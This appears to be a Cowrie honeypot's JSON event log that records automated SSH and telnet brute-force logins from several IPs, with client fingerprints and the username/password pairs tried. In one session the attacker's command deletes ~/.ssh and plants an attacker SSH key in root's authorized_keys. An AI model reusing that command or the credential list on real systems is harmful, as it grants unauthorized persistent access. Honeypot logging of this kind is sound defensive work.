{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.076325Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.077160Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":43254,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ebf213592e2","protocol":"ssh","message":"New connection: 46.101.8.63:43254 (1.2.3.4:22) [session: 4ebf213592e2]","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.098941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.099708Z","src_ip":"46.101.8.63","session":"4ebf213592e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.122736Z","src_ip":"46.101.8.63","session":"4ebf213592e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:54:42.254183Z","src_ip":"46.101.8.63","session":"4ebf213592e2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.280086Z","src_ip":"46.101.8.63","session":"4ebf213592e2"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":43894,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fad71662a86","protocol":"ssh","message":"New connection: 46.101.8.63:43894 (1.2.3.4:22) [session: 2fad71662a86]","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.300559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.301105Z","src_ip":"46.101.8.63","session":"2fad71662a86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.322728Z","src_ip":"46.101.8.63","session":"2fad71662a86"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.447030Z","src_ip":"46.101.8.63","session":"2fad71662a86"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.469816Z","src_ip":"46.101.8.63","session":"dc7fb0a75f0e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:54:43.470815Z","src_ip":"46.101.8.63","session":"2fad71662a86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54344,"dst_ip":"1.2.3.4","dst_port":23,"session":"eeeb75871464","protocol":"telnet","message":"New connection: 212.227.125.160:54344 (1.2.3.4:23) [session: eeeb75871464]","sensor":"my-vps","timestamp":"2025-09-08T23:54:49.955384Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:54:50.039133Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:54:50.094562Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T23:54:50.095852Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T23:54:50.096777Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":59652,"dst_ip":"1.2.3.4","dst_port":22,"session":"efe3ec537f47","protocol":"ssh","message":"New connection: 93.113.63.124:59652 (1.2.3.4:22) [session: efe3ec537f47]","sensor":"my-vps","timestamp":"2025-09-08T23:55:00.327383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:00.328162Z","src_ip":"93.113.63.124","session":"efe3ec537f47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:00.400830Z","src_ip":"93.113.63.124","session":"efe3ec537f47"}
{"eventid":"cowrie.login.failed","username":"nfsnobod","password":"12345","message":"login attempt [nfsnobod/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T23:55:00.741748Z","src_ip":"93.113.63.124","session":"efe3ec537f47"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:01.816620Z","src_ip":"93.113.63.124","session":"efe3ec537f47"}
{"eventid":"cowrie.session.closed","duration":30.740832328796387,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:02.303745Z","src_ip":"49.245.109.137","session":"1781230e8abd"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":44350,"dst_ip":"1.2.3.4","dst_port":22,"session":"b21b9dc5aff7","protocol":"ssh","message":"New connection: 182.18.161.165:44350 (1.2.3.4:22) [session: b21b9dc5aff7]","sensor":"my-vps","timestamp":"2025-09-08T23:55:05.606234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:05.607152Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:05.860822Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.login.success","username":"root","password":"alexander123","message":"login attempt [root/alexander123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:55:06.918148Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:55:07.495265Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:55:07.496001Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:55:07.496989Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:07.751983Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:55:08.275603Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:55:08.277591Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:55:08.533639Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:08.534792Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":46736,"dst_ip":"1.2.3.4","dst_port":22,"session":"d49078e5968f","protocol":"ssh","message":"New connection: 182.18.161.165:46736 (1.2.3.4:22) [session: d49078e5968f]","sensor":"my-vps","timestamp":"2025-09-08T23:55:08.773744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:08.774865Z","src_ip":"182.18.161.165","session":"d49078e5968f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:09.024014Z","src_ip":"182.18.161.165","session":"d49078e5968f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:55:10.062785Z","src_ip":"182.18.161.165","session":"d49078e5968f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:11.314027Z","src_ip":"182.18.161.165","session":"d49078e5968f"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":46740,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9abf43c93c9","protocol":"ssh","message":"New connection: 182.18.161.165:46740 (1.2.3.4:22) [session: d9abf43c93c9]","sensor":"my-vps","timestamp":"2025-09-08T23:55:11.558032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:11.558710Z","src_ip":"182.18.161.165","session":"d9abf43c93c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:11.804129Z","src_ip":"182.18.161.165","session":"d9abf43c93c9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:55:12.826084Z","src_ip":"182.18.161.165","session":"d9abf43c93c9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:13.072203Z","src_ip":"182.18.161.165","session":"d9abf43c93c9"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:13.080430Z","src_ip":"182.18.161.165","session":"b21b9dc5aff7"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":57030,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecd059050b31","protocol":"ssh","message":"New connection: 45.150.34.92:57030 (1.2.3.4:22) [session: ecd059050b31]","sensor":"my-vps","timestamp":"2025-09-08T23:55:13.304299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:13.305817Z","src_ip":"45.150.34.92","session":"ecd059050b31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:19.532914Z","src_ip":"45.150.34.92","session":"ecd059050b31"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:19.534640Z","src_ip":"45.150.34.92","session":"ecd059050b31"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":40410,"dst_ip":"1.2.3.4","dst_port":22,"session":"e75d16537777","protocol":"ssh","message":"New connection: 46.101.8.63:40410 (1.2.3.4:22) [session: e75d16537777]","sensor":"my-vps","timestamp":"2025-09-08T23:55:43.061330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:55:43.062252Z","src_ip":"46.101.8.63","session":"e75d16537777"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:55:43.082781Z","src_ip":"46.101.8.63","session":"e75d16537777"}
{"eventid":"cowrie.login.failed","username":"client","password":"Password123","message":"login attempt [client/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:55:43.203487Z","src_ip":"46.101.8.63","session":"e75d16537777"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:44.226534Z","src_ip":"46.101.8.63","session":"e75d16537777"}
